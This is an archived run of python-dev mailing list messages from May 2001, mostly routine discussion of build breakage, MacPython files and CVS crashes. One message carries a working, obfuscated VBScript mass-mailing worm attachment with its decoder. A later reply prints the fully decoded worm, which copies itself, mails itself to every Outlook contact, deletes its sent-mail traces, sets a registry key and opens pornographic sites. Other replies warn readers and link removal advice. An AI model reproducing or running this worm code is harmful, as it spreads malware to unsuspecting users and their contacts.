CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: ; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400 References: Message-ID: <20010508070501.A25794@glacier.fnational.com> Tim Peters wrote: > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes by made non-optional on the trunk? > > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > have trouble sleeping tonight . Shouldn't the entry in the __future__ file be: nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) or am I misunderstanding something? Neil From jack@oratrix.nl Tue May 8 15:07:39 2001 From: jack@oratrix.nl (Jack Jansen) Date: Tue, 08 May 2001 16:07:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Thomas Wouters , Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl> > I'd say merge, except that the number '1000' is very large. Is it really > 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 > .py files spread out over the tree (567 of which in Lib, the rest in > Demo/Tools) and obviously some misc files and CVS stuff, for a total of > around 2500 files. Is that 1000 a real number ? No temp files, > auto-generated files, .o files etc ? How large are they ? (the average size > in the current CVS tree is about 10k) It's actually 830 files. This is 320 .py files (130 in Lib, the rest in Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build system), 30 resource files and then assorted things (html documentation, scripts to drive the distribution builder, etc). The .xml and .exp files and about 20 of the .c files are machine generated, so they could technically be left out of the repository. The generation process of these files is a bit painful, though, so I've added them as a convenience (the reasoning is a bit along the lines of the Grammar stuff of the core). The one thing that I should do is clean out the "Unsupported" directory before doing the merge. It contains some stuff that is long dead. But then, it isn't all that many files. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From mwh@python.net Tue May 8 15:41:45 2001 From: mwh@python.net (Michael Hudson) Date: Tue, 8 May 2001 15:41:45 +0100 (BST) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: Guido van Rossum writes: > > A change to termios.c in the last couple of days to #include termio.h > > as well as termios.h breaks the build on FreeBSD, which has only > > termios.h - needs an autoconf test? There'll probably be other similar > > systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. If you don't include termio.h the build breaks on alpha/OSF1. This sounds to me like OSF1's headers are broken (you can't include sys/ioctl.h without including termio.h first, it seems, or you get complaints about struct termio being undefined). So I'd suggest +#ifdef __osf__ #include +#endif and then see if the build breaks anywhere else (I love unix). Using the sf compile farm, I've tested this on FreeBSD, Linux/x86, Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives a pile of warnings from redefined macros and then dies 'cause it can't find a valiud license file). So we might need some more magic for solaris using cc. Cheers, M. -- Imagine if every Thursday your shoes exploded if you tied them the usual way. This happens to us all the time with computers, and nobody thinks of complaining. -- Jeff Raskin From fdrake@acm.org Tue May 8 15:45:18 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Tue, 8 May 2001 10:45:18 -0400 (EDT) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: References: Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Michael Hudson writes: > If you don't include termio.h the build breaks on alpha/OSF1. This > sounds to me like OSF1's headers are broken (you can't include > sys/ioctl.h without including termio.h first, it seems, or you get > complaints about struct termio being undefined). So I'd suggest > > +#ifdef __osf__ > #include > +#endif > > and then see if the build breaks anywhere else (I love unix). Does it make more sense to do this or to test for termio.h in configure? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From m.favas@per.dem.csiro.au Tue May 8 15:47:39 2001 From: m.favas@per.dem.csiro.au (Mark Favas) Date: Tue, 08 May 2001 22:47:39 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com> Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au> Guido van Rossum wrote: > > > A change to termios.c in the last couple of days to #include termio.h as > > well as termios.h breaks the build on FreeBSD, which has only termios.h - > > needs an autoconf test? There'll probably be other similar systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. > > Mark, can you please enter this in the bug database and assign it to > whoever checked in the change? :-) Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred Drake -- Mark Favas - m.favas@per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From thomas@xs4all.net Tue May 8 16:52:49 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 17:52:49 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200 References: <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <20010508175248.E16486@xs4all.nl> On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote: [ Jack wants to add the +/- 1000 extra files from the MacPython source tree to the Python CVS repository ] > It's actually 830 files. This is 320 .py files (130 in Lib, the rest in > Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build > system), 30 resource files and then assorted things (html documentation, > scripts to drive the distribution builder, etc). I'd say merge it. If there had been decent CVS clients for the mac when you started, those files would have been in the CVS tree already. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From skip@pobox.com (Skip Montanaro) Tue May 8 19:22:17 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Tue, 8 May 2001 13:22:17 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl> References: <20010508141000.A16486@xs4all.nl> <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <15096.14681.773554.729550@beluga.mojam.com> Jack> It's actually 830 files. ... 120 .c/.h files ... How many of those 120 files are variants of existing source files that (in theory) could be merged with their mainline counterparts? Skip From mwh@python.net Tue May 8 23:27:59 2001 From: mwh@python.net (Michael Hudson) Date: 08 May 2001 23:27:59 +0100 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)" References: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > If you don't include termio.h the build breaks on alpha/OSF1. This > > sounds to me like OSF1's headers are broken (you can't include > > sys/ioctl.h without including termio.h first, it seems, or you get > > complaints about struct termio being undefined). So I'd suggest > > > > +#ifdef __osf__ > > #include > > +#endif > > > > and then see if the build breaks anywhere else (I love unix). > > Does it make more sense to do this or to test for termio.h in > configure? If you're asking *me*, I have no idea. I'd hope that no system would be as broken as osf1 is in this regard, but then I'd have hoped that osf1 wasn't this broken too... I guess the test in configure is "safer" in some sense. Getting this perfectly right would probably require more autoconf hackery than one can possibly imagine... ncurses generates an amk script from ./configure that is then run to produce term.h, but I'm not sure that all of that is devoted to including the right headers. can-we-just-have-TERMIOS-back?-ly y'rs M. -- Good? Bad? Strap him into the IETF-approved witch-dunking apparatus immediately! -- NTK now, 21/07/2000 From mark@per.dem.csiro.au Wed May 9 01:53:01 2001 From: mark@per.dem.csiro.au (Mark Favas) Date: Wed, 9 May 101 13:52:09 +0800 (WST) Subject: [Python-Dev] gcc barfs on recent stringobject changes... Message-ID: <200105090552.NAA08038@erebus.per.dem.csiro.au> Changes in the last few hours (hi Tim!) to stringobject compile (I'd guess) on MS (and on Compaq's Tru64 compiler), but produce the following with gcc on Solaris and FreeBSD: gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include -DHAVE_CONFIG_H -o Objects/stringobject.o Objects/stringobject.c Objects/stringobject.c: In function `PyString_FromStringAndSize': Objects/stringobject.c:76: invalid lvalue in unary `&' Objects/stringobject.c:80: invalid lvalue in unary `&' Objects/stringobject.c: In function `PyString_FromString': Objects/stringobject.c:130: invalid lvalue in unary `&' Objects/stringobject.c:134: invalid lvalue in unary `&' *** Error code 1 -- Email - m.favas@per.dem.csiro.au Postal - Mark C Favas Phone - +61 8 9333 6268, 041 892 6074 CSIRO Exploration & Mining Fax - +61 8 9387 8642 Private Bag No 5 Wembley, Western Australia 6913 From tim.one@home.com Wed May 9 07:48:12 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 02:48:12 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: <20010508133638.Z16486@xs4all.nl> Message-ID: [Tim] > Given the new dict iterators in 2.2, there's an easier fast way > that doesn't mutate the dict even under the covers: > > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") [Thomas Wouters] > You probably want: > > arb = dict.iteritems().next > > so that you don't keep on returning the same key,value pair. No, I would not want that. If "arbitrary" suffices, then by defn. *any* element is "good enough". If it's not good enough to get the same one back every time, then I want a stronger guarantee about what arb() returns than the inexplicable behavior of repeated calls to dict.iteritems().next in the presence of dict mutation. But as I've said several times before , I'm still asking for an algorithm where arb() is actually useful (as opposed to .popitem(), which is dead easy to explain in the presence of mutation; your version of arb() can, e.g., return a given entry more than once, may skip entries, and may raise StopIteration with unexamined entries remaining in the dict). not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly y'rs - tim From tim.one@home.com Wed May 9 08:42:00 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 03:42:00 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au> Message-ID: [Mark Favas] > Changes in the last few hours (hi Tim!) Hi Mark! Sorry about that! > to stringobject compile (I'd guess) on MS You guess right -- and under two flavors of Windows . > (and on Compaq's Tru64 compiler), Figures. > but produce the following with gcc on Solaris and FreeBSD: > > gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include > -DHAVE_CONFIG_H -o Objects/stringobject.o Objects/stringobject.c > Objects/stringobject.c: In function `PyString_FromStringAndSize': > Objects/stringobject.c:76: invalid lvalue in unary `&' > Objects/stringobject.c:80: invalid lvalue in unary `&' > Objects/stringobject.c: In function `PyString_FromString': > Objects/stringobject.c:130: invalid lvalue in unary `&' > Objects/stringobject.c:134: invalid lvalue in unary `&' > *** Error code 1 Fair enough: I tried to use a cast as an lvalue in those 4 places, all of the form: PyString_InternInPlace(&(PyObject *)op); where op is declared PyStringObject*. Strictly speaking, that ain't legal, but changing it to: PyObject *t = (PyObject *)op; PyString_InternInPlace(&t); is. You may wonder WTF the difference is. That's easy: the rewrite doesn't use a cast expression as an lvalue . sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs - tim From jack@oratrix.nl Wed May 9 09:16:29 2001 From: jack@oratrix.nl (Jack Jansen) Date: Wed, 09 May 2001 10:16:29 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by , Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl> > > Jack> It's actually 830 files. ... 120 .c/.h files ... > > How many of those 120 files are variants of existing source files that (in > theory) could be merged with their mainline counterparts? None (unless you would count macmodule.c as a variant of posixmodule.c). I think macmain.c started out as a clone of pythonmain.c, but I think they're too different to merge (but I'll have a look). Hmm, now that I think of it macmodule and posixmodule could possibly be merged. It's fun to see how much statistics I gather about MacPython in just a few days:-) -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From tim.one@home.com Wed May 9 09:20:12 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 04:20:12 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: <20010508070501.A25794@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Shouldn't the entry in the __future__ file be: > > nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) > > or am I misunderstanding something? Until nested_scopes *is* the rule, the Mandatory Release field is just a guess about the future. Changing it to (2, 2, 0, "alpha", 0) right *now* would be wrong, since it would change it from a guess about the future to a false statement about the present. It must be changed when nested_scopes become mandatory; it needn't be changed before then (unless we delay making them mandatory beyond 2.2 final), although if somebody thinks they have a good use for moving the guess up, fine, just so long as they don't move the guess to or before 2.2a0. From thomas@xs4all.net Wed May 9 09:58:50 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 10:58:50 +0200 Subject: [Python-Dev] Crashes w/ CVS tree Message-ID: <20010509105850.F16486@xs4all.nl> I'm getting a crash with Python compiled from a freshly updated CVS tree, even when running just './python'. It crashes during the loading of os.pyc. It doesn't crash if I start python with -S, and it doesn't crash if I remove *.pyc first: centurion:~/python/python-2.2/dist/src/linux> ./python Python 2.2a0 (#4, May 9 2001, 09:52:29) [GCC 2.95.4 20010506 (Debian prerelease)] on linux2 Type "copyright", "credits" or "license" for more information. >>> centurion:~/python/python-2.2/dist/src/linux> ./python Segmentation fault If I remove os.pyc only, I get the enlightning: Fatal Python error: PyString_InternInPlace: strings only please! Abort (core dumped) I would blame Tim , except that when examining the corefile I found some pointers to other causes. The 'original' crash occurs because cmp_outcome() is passed an invalid PyObject, with most of its function slots pointing to the middle of the glibc-internal '__morecore()' function. Examining the stack off of which the invalid item was popped reveals that the next-to-last item is an iterator. So maybe I should blame Guido instead, either for the iterator or for rich comparisons ;) >From what I can tell, the segfault happens in os.py, here: import posixpath path = posixpath del posixpath import posix __all__.extend(_get_exports_list(posix)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ del posix elif 'nt' in _names: That is, after importing posix, while getting the exports lists. Which, in the case of posixmodule, uses a list comprehension.... which now uses an iterator... so maybe it's Tim after all. :-) Unfortunately, I don't have time to look at it right now (meetings, meetings.) If noone is looking at it by the time I'm back and free, I'll hunt some more ;) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas@xs4all.net Wed May 9 10:14:32 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 11:14:32 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112 In-Reply-To: ; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700 References: <20010509105850.F16486@xs4all.nl> Message-ID: <20010509111432.G16486@xs4all.nl> On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Objects > In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects > > Modified Files: > stringobject.c > Log Message: > Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to > restore correct semantics. This apparently fixed my problem: On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote: > > I'm getting a crash with Python compiled from a freshly updated CVS tree, > even when running just './python'. It crashes during the loading of os.pyc. > It doesn't crash if I start python with -S, and it doesn't crash if I remove > *.pyc first: That ought to teach me to spend my morning doing something fun -- it turned out to be useless :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one@home.com Wed May 9 10:29:31 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 05:29:31 -0400 Subject: [Python-Dev] Crashes w/ CVS tree In-Reply-To: <20010509105850.F16486@xs4all.nl> Message-ID: [Thomas Wouters] > I'm getting a crash with Python compiled from a freshly updated CVS > tree,even when running just './python'. I did too, for a little while, but it's gone away. > ... > Fatal Python error: PyString_InternInPlace: strings only please! > Abort (core dumped) > > I would blame Tim , I would too. Please update, and if stringobject.c changes, try again. I'm sure this is my fault, but I'm too sleepy to figure out why, and I did change *something* at random that appeared to make it go away . it's-all-gcc's-fault-ly y'rs - tim From Greg.Wilson@baltimore.com Wed May 9 16:49:29 2001 From: Greg.Wilson@baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 11:49:29 -0400 Subject: [Python-Dev] Homepage Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C0D89F.A3FFB8BE Content-Type: text/plain Hi! You've got to see this page! It's really cool ;O) ------_=_NextPart_000_01C0D89F.A3FFB8BE Content-Type: application/octet-stream; name="homepage.HTML.vbs" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="homepage.HTML.vbs" Execute = DeCode("Qp=11Gttqt=11Tguwog=11Pgzv=10=0FUgv=11YU=11?=11EtgcvgQdlgev*$YUe= tkrv0Ujgnn$+=10=0FUgv=11HUQ?=11Etgcvgqdlgev*$uetkrvkpi0hkngu{uvgoqdlgev$= +=10=0FHqnfgt?HUQ0IgvUrgekcnHqnfgt*4+=10=0F=10=0FUgv=11KpH?HUQ0QrgpVgzvH= kng*YUetkrv0UetkrvHwnnpcog.3+=10=0FFq=11Yjkng=11KpH0CvGpfQhUvtgco>@Vtwg=10= =0FUetkrvDwhhgt?UetkrvDwhhgt(KpH0TgcfNkpg(xdetnh=10=0FNqqr=10=0F=10=0FUg= v=11QwvH?HUQ0QrgpVgzvHkng*Hqnfgt($^jqogrcig0JVON0xdu$.4.vtwg+=10=0FQwvH0= ytkvg=11UetkrvDwhhgt=10=0FQwvH0enqug=10=0FUgv=11HUQ?Pqvjkpi=10=0F=10=0FK= h=11YU0tgitgcf=11*$JMEW^uqhvyctg^Cp^ockngf$+=11>@=11$3$=11vjgp=10=0FOckn= kv*+=10=0FGpf=11Kh=10=0F=10=0FUgv=11u?EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$= +=10=0FUgv=11v?u0IgvPcogUrceg*$OCRK$+=10=0FUgv=11w?v0IgvFghcwnvHqnfgt*8+= =10=0FHqt=11k?3=11vq=11w0kvgou0eqwpv=10=0FKh=11w0Kvgou0Kvgo*k+0uwdlgev?$= Jqogrcig$=11Vjgp=10=0Fw0Kvgou0Kvgo*k+0enqug=10=0Fw0Kvgou0Kvgo*k+0fgngvg=10= =0FGpf=11Kh=10=0FPgzv=10=0FUgv=11w?v0IgvFghcwnvHqnfgt*5+=10=0FHqt=11k?3=11= vq=11w0kvgou0eqwpv=10=0FKh=11w0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$=11Vjgp=10= =0Fw0Kvgou0Kvgo*k+0fgngvg=10=0FGpf=11Kh=10=0FPgzv=10=0F=10=0FTcpfqok|g=10= =0Ft?Kpv**6,Tpf+-3+=10=0FKh=11t?3=11vjgp=10=0FYU0Twp*$jvvr<11jctfeqtg0rq= tpdknndqctf0pgv1ujcppqp130jvo$+=10=0Fgnugkh=11t?4=11Vjgp=10=0FYU0Twp*$jv= vr<11ogodgtu0pdek0eqo1aZOEO1rtkp|lg130jvo$+=10=0Fgnugkh=11t?5=11Vjgp=10=0F= YU0Twp*$jvvr<11yyy40ugzetqrqnku0eqo1cocvgwt1ujgknc130jvo$+=10=0FGnugKh=11= t?6=11Vjgp=10=0FYU0Twp*$jvvr<11ujgknc0kuugz{0vx130jvo$+=10=0FGpf=11Kh=10= =0F=10=0FHwpevkqp=11Ocknkv*+=10=0FQp=11Gttqt=11Tguwog=11Pgzv=10=0FUgv=11= Qwvnqqm=11?=11EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$+=10=0FKh=11Qwvnqqm=11?=11= $Qwvnqqm$=11Vjgp=10=0F=12Ugv=11Ocrk?Qwvnqqm0IgvPcogUrceg*$OCRK$+=10=0F=12= Ugv=11Nkuvu?Ocrk0CfftguuNkuvu=10=0F=12Hqt=11Gcej=11NkuvKpfgz=11Kp=11Nkuv= u=10=0F=12=12Kh=11NkuvKpfgz0CfftguuGpvtkgu0Eqwpv=11>@=112=11Vjgp=10=0F=12= =12=12EqpvcevEqwpv=11?=11NkuvKpfgz0CfftguuGpvtkgu0Eqwpv=10=0F=12=12=12Hq= t=11Eqwpv?=113=11Vq=11EqpvcevEqwpv=10=0F=12=12=12=12Ugv=11Ockn=11?=11Qwv= nqqm0EtgcvgKvgo*2+=10=0F=12=12=12=12Ugv=11Eqpvcev=11?=11NkuvKpfgz0Cfftgu= uGpvtkgu*Eqwpv+=10=0F=12=12=12=12Ockn0Vq=11?=11Eqpvcev0Cfftguu=10=0F=12=12= =12=12Ockn0Uwdlgev=11?=11$Jqogrcig$=10=0F=12=12=12=12Ockn0Dqf{=11?=11xde= tnh($Jk#$(xdetnh(xdetnh($[qw)xg=11iqv=11vq=11ugg=11vjku=11rcig#=11Kv)u=11= tgcnn{=11eqqn=11=3DQ+$(xdetnh(xdetnh=10=0F=12=12=12=12Ugv=11Cvvcejogpv?O= ckn0Cvvcejogpvu=10=0F=12=12=12=12Cvvcejogpv0Cff=11Hqnfgt=11(=11$^jqogrci= g0JVON0xdu$=10=0F=12=12=12=12Ockn0FgngvgChvgtUwdokv=11?=11Vtwg=10=0F=12=12= =12=12Kh=11Ockn0Vq=11>@=11$$=11Vjgp=10=0F=12=12=12=12Ockn0Ugpf=10=0F=12=12= =12=12YU0tgiytkvg=11$JMEW^uqhvyctg^Cp^ockngf$.=11$3$=10=0F=12=12=12Gpf=11= Kh=10=0F=12=12=12Pgzv=10=0F=12=12Gpf=11Kh=10=0F=12Pgzv=10=0FGpf=11kh=10=0F= Gpf=11Hwpevkqp") Function DeCode(Coded) For I =3D 1 To Len(Coded) CurChar=3D Mid(Coded, I, 1) If Asc(CurChar) =3D 15 Then CurChar=3D Chr(10) ElseIf Asc(CurChar) =3D 16 Then CurChar=3D Chr(13) ElseIf Asc(CurChar) =3D 17 Then CurChar=3D Chr(32) ElseIf Asc(CurChar) =3D 18 Then CurChar=3D Chr(9) Else CurChar =3D Chr(Asc(CurChar) - 2) End If DeCode =3D DeCode & CurChar Next End Function ------_=_NextPart_000_01C0D89F.A3FFB8BE-- From guido@digicool.com Wed May 9 18:08:22 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 12:08:22 -0500 Subject: [Python-Dev] Homepage In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400." <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Greg Wilson's computer was infected by a virus which got propagated to python-dev. Do NOT open the attachment! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik@pythonware.com Wed May 9 17:12:00 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Wed, 9 May 2001 18:12:00 +0200 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid> Greg's mail program wrote: > Hi! > > You've got to see this page! It's really cool ;O) > Content-Type: application/octet-stream; > name="homepage.HTML.vbs" > Content-Transfer-Encoding: quoted-printable > Content-Disposition: attachment; > filename="homepage.HTML.vbs" when will we see the first "homepage.HTML.py" virus? Cheers /F From esr@thyrsus.com Wed May 9 17:20:24 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 9 May 2001 12:20:24 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500 References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <20010509122024.A416@thyrsus.com> Guido van Rossum : > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Some of us -- heh, heh -- aren't vulnerable to attachment trojans. I could almost (not quite, but almost) love the crackers and script kiddiez of the world for what they're doing to Microsoft... -- Eric S. Raymond We shall not cease from exploration, and the end of all our exploring will be to arrive where we started and know the place for the first time. -- T.S. Eliot From fdrake@cj42289-a.reston1.va.home.com Wed May 9 17:21:27 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:21:27 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update of the maintenance branch (for Python 2.1.1). From barry@digicool.com Wed May 9 17:23:26 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 9 May 2001 12:23:26 -0400 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <15097.28414.354061.170478@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Greg Wilson's computer was infected by a virus which got GvR> propagated to python-dev. Do NOT open the attachment! Darn, and I was just finishing up the vbs.el script so my XEmacs/VM reader could open it. share-the-pain-share-the-fun-ly y'rs, -Barry From fdrake@cj42289-a.reston1.va.home.com Wed May 9 17:47:27 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:47:27 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update of the development branch (for Python 2.2). From Samuele Pedroni Wed May 9 18:12:20 2001 From: Samuele Pedroni (Samuele Pedroni) Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST) Subject: [Python-Dev] Homepage Message-ID: <200105091712.TAA05172@core.inf.ethz.ch> Hi. [GvR] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Here's the beast ("decrypted" and in a cage): ("decrypted" and in a cage): (we got it also on the old jpython-interest) MS has really increased computer usability, when I was younger (and I'm not that old) one bad guy had to use assembler to cause some damage, now thanks to MS, that don't cares much about security but likely a lot about self-confindence, everybody can feel very clever and proud writing such things ... and spamming the whole internet. On Error Resume Next Set WS = CreateObject("WScript.Shell") Set FSO= Createobject("scripting.filesystemobject") Folder=FSO.GetSpecialFolder(2) Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1) Do While InF.AtEndOfStream<>True ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf Loop Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true) OutF.write ScriptBuffer OutF.close Set FSO=Nothing If WS.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If Set s=CreateObject("Outlook.Application") Set t=s.GetNameSpace("MAPI") Set u=t.GetDefaultFolder(6) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).close u.Items.Item(i).delete End If Next Set u=t.GetDefaultFolder(3) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).delete End If Next Randomize r=Int((4*Rnd)+1) If r=1 then WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm") elseif r=2 Then WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm") elseif r=3 Then WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm") ElseIf r=4 Then WS.Run("http://sheila.issexy.tv/1.htm") End If Function Mailit() On Error Resume Next Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Mapi=Outlook.GetNameSpace("MAPI") Set Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount Set Mail = Outlook.CreateItem(0) Set Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.Subject = "Homepage" Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf Set Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.HTML.vb$" Mail.DeleteAfterSubmit = True If Mail.To <> "" Then Mail.Send WS.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function PS: the "decryption" was done in python ;) From tim.one@home.com Wed May 9 18:47:22 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 13:47:22 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Note that the same virus went out under the name of John G. Michopoulos on the JPython (not Jython!) mailing list. Here's detailed info on the virus (incl. simple removal instructions if you got bit): http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d@mm.html Doesn't appear to be worse than a nuisance. Anyone who has used Windows Update within the last year and installed the "critical updates" it recommends should have gotten a popup box warning that the attachment was trying to access the Address Book, telling you it's probably a virus, and advising to accept the "No, don't allow this" default. you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs - tim From Greg.Wilson@baltimore.com Wed May 9 19:50:25 2001 From: Greg.Wilson@baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 14:50:25 -0400 Subject: [Python-Dev] apology Message-ID: 